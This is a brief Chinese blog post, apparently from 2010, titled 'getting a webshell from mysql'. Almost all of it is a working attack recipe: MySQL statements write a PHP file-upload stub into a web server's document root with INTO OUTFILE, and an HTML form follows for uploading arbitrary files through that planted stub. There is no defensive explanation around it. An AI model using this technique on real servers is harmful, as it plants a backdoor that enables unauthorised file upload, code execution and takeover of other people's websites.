mysql得到wenshell

create table tmp (cmd TEXT);

insert into tmp (cmd) values ('<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>');

SELECT * FROM tmp into OUTFILE 'd:\\website\\htdocs\\upload.php' ;

然后:

<form ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/upload.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>

posted on 2010-02-01 16:28  fancing  阅读(181)  评论(0编辑  收藏  举报
Powered by:
博客园
Copyright © 2024 fancing
Powered by .NET 9.0 on Kubernetes